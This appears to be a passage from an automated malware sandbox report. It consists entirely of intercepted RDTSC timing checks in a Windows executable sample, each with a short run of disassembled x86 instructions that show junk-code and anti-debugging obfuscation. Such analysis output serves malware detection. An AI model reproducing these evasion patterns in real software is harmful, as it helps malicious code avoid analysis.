Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E185A second address: 15E185E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DEC24 second address: 15DECBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ebx, 5C4B8814h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F19CD112F68h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 jmp 00007F19CD112F75h 0x0000003b mov eax, dword ptr [ebp+122D00F9h] 0x00000041 call 00007F19CD112F74h 0x00000046 or dword ptr [ebp+122D3322h], esi 0x0000004c pop edi 0x0000004d push FFFFFFFFh 0x0000004f jbe 00007F19CD112F6Ch 0x00000055 or dword ptr [ebp+122D33A5h], esi 0x0000005b nop 0x0000005c push ecx 0x0000005d push ebx 0x0000005e jp 00007F19CD112F66h 0x00000064 pop ebx 0x00000065 pop ecx 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a push eax 0x0000006b pop eax 0x0000006c push edi 0x0000006d pop edi 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DECBA second address: 15DECC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DECC0 second address: 15DECC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E09B6 second address: 15E09BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DFB4B second address: 15DFBD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D360Ch], edi 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov bx, 196Ah 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 jmp 00007F19CD112F6Ch 0x00000027 mov eax, dword ptr [ebp+122D07D1h] 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F19CD112F68h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 push FFFFFFFFh 0x00000049 push 00000000h 0x0000004b push edi 0x0000004c call 00007F19CD112F68h 0x00000051 pop edi 0x00000052 mov dword ptr [esp+04h], edi 0x00000056 add dword ptr [esp+04h], 00000016h 0x0000005e inc edi 0x0000005f push edi 0x00000060 ret 0x00000061 pop edi 0x00000062 ret 0x00000063 mov ebx, dword ptr [ebp+122D3907h] 0x00000069 push eax 0x0000006a pushad 0x0000006b jo 00007F19CD112F6Ch 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E3902 second address: 15E390B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E390B second address: 15E3980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F19CD112F68h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 mov edi, dword ptr [ebp+122D393Fh] 0x0000002d push 00000000h 0x0000002f or dword ptr [ebp+122D195Ah], edi 0x00000035 xchg eax, esi 0x00000036 jmp 00007F19CD112F70h 0x0000003b push eax 0x0000003c pushad 0x0000003d pushad 0x0000003e jmp 00007F19CD112F78h 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E4996 second address: 15E49B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007F19CCBA87BEh 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E49B3 second address: 15E49BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F19CD112F66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E49BD second address: 15E4A2B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F19CCBA87B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D35CFh] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F19CCBA87B8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov dword ptr [ebp+1247D5DEh], esi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007F19CCBA87B8h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 cmc 0x00000052 push eax 0x00000053 push edi 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 pop eax 0x00000058 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E5902 second address: 15E5916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19CD112F6Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E3AD5 second address: 15E3AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E3AD9 second address: 15E3ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E3ADD second address: 15E3AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E8AF9 second address: 15E8AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E4B64 second address: 15E4BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F19CCBA87B8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 sub edi, dword ptr [ebp+122D36F3h] 0x0000002c push dword ptr fs:[00000000h] 0x00000033 xor dword ptr [ebp+1247D5DEh], ebx 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov dword ptr [ebp+122D58BCh], esi 0x00000046 mov eax, dword ptr [ebp+122D1291h] 0x0000004c mov ebx, dword ptr [ebp+1247D834h] 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push ebx 0x00000057 call 00007F19CCBA87B8h 0x0000005c pop ebx 0x0000005d mov dword ptr [esp+04h], ebx 0x00000061 add dword ptr [esp+04h], 00000014h 0x00000069 inc ebx 0x0000006a push ebx 0x0000006b ret 0x0000006c pop ebx 0x0000006d ret 0x0000006e mov ebx, dword ptr [ebp+122D18C6h] 0x00000074 nop 0x00000075 push eax 0x00000076 push edx 0x00000077 jc 00007F19CCBA87B8h 0x0000007d push eax 0x0000007e pop eax 0x0000007f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E8AFD second address: 15E8B07 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F19CD112F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E4BEE second address: 15E4BF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E6C59 second address: 15E6C5E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E8D21 second address: 15E8D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E8D2D second address: 15E8D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E8D31 second address: 15E8D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15ECC32 second address: 15ECC56 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F19CD112F7Eh 0x00000008 jmp 00007F19CD112F78h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15ECC56 second address: 15ECC60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F19CCBA87B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15ECC60 second address: 15ECC74 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F19CD112F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15ECC74 second address: 15ECC87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15ECC87 second address: 15ECC8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F45C5 second address: 15F45CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F45CB second address: 15F45CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F3D72 second address: 15F3D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F19CCBA87B6h 0x0000000a jmp 00007F19CCBA87C1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F5C02 second address: 15F5C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F754F second address: 15F7555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F7555 second address: 15F7562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007F19CD112F72h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F7562 second address: 15F7568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F7568 second address: 15F758A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F19CD112F6Eh 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007F19CD112F66h 0x00000012 popad 0x00000013 push edx 0x00000014 jbe 00007F19CD112F72h 0x0000001a jno 00007F19CD112F66h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F8C2D second address: 15F8C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F8C33 second address: 15F8C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push esi 0x00000007 pushad 0x00000008 jne 00007F19CD112F66h 0x0000000e jmp 00007F19CD112F71h 0x00000013 jno 00007F19CD112F66h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FD164 second address: 15FD16C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FD16C second address: 15FD172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FD172 second address: 15FD176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FD176 second address: 15FD1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F19CD112F77h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F19CD112F6Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007F19CD112F76h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FD1BE second address: 15FD1D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FD1D7 second address: 15FD1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F19CD112F66h 0x0000000e jmp 00007F19CD112F6Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FD1EF second address: 15FD223 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C5h 0x00000007 jmp 00007F19CCBA87C8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FF41F second address: 15FF441 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007F19CD112F71h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FF441 second address: 15FF448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FF448 second address: 15FF46F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jno 00007F19CD112F74h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FF46F second address: 15FF473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FF473 second address: 15FF477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FF477 second address: 15FF485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F19CCBA87B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FF528 second address: 15FF59C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19CD112F72h 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c jmp 00007F19CD112F77h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 je 00007F19CD112F70h 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e jbe 00007F19CD112F66h 0x00000024 popad 0x00000025 mov eax, dword ptr [eax] 0x00000027 push ecx 0x00000028 jmp 00007F19CD112F6Bh 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 pushad 0x00000033 jo 00007F19CD112F79h 0x00000039 jmp 00007F19CD112F73h 0x0000003e push ebx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FF661 second address: 15FF66B instructions: 0x00000000 rdtsc 0x00000002 js 00007F19CCBA87BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 158FBD0 second address: 158FBD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 158FBD4 second address: 158FBE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F19CCBA87BAh 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 158FBE6 second address: 158FC09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CD112F79h 0x00000009 ja 00007F19CD112F66h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1605515 second address: 1605525 instructions: 0x00000000 rdtsc 0x00000002 js 00007F19CCBA87B6h 0x00000008 jp 00007F19CCBA87B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1605525 second address: 1605532 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007F19CD112F66h 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1605532 second address: 1605538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1605673 second address: 1605689 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F6Ch 0x00000007 je 00007F19CD112F66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1605689 second address: 16056D4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F19CCBA87C2h 0x00000008 jno 00007F19CCBA87C4h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jnc 00007F19CCBA87BCh 0x00000017 jmp 00007F19CCBA87C1h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16056D4 second address: 16056DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16056DA second address: 16056FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19CCBA87C8h 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 160583A second address: 160583E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 160583E second address: 1605844 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1605844 second address: 1605850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F19CD112F66h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1605850 second address: 1605854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1605854 second address: 1605863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F19CD112F66h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 160A8D2 second address: 160A8D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 160A8D8 second address: 160A8DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16097B4 second address: 16097D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F19CCBA87C6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D8375 second address: 15D8385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CD112F6Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D8385 second address: 15D8389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D8389 second address: 15B8105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F19CD112F68h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov edi, dword ptr [ebp+122D3767h] 0x0000002b mov edx, dword ptr [ebp+122D38EBh] 0x00000031 call dword ptr [ebp+122D1BB3h] 0x00000037 push eax 0x00000038 push edx 0x00000039 jng 00007F19CD112F6Ch 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D8905 second address: 15D890A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D8DEA second address: 15D8DF4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F19CD112F6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
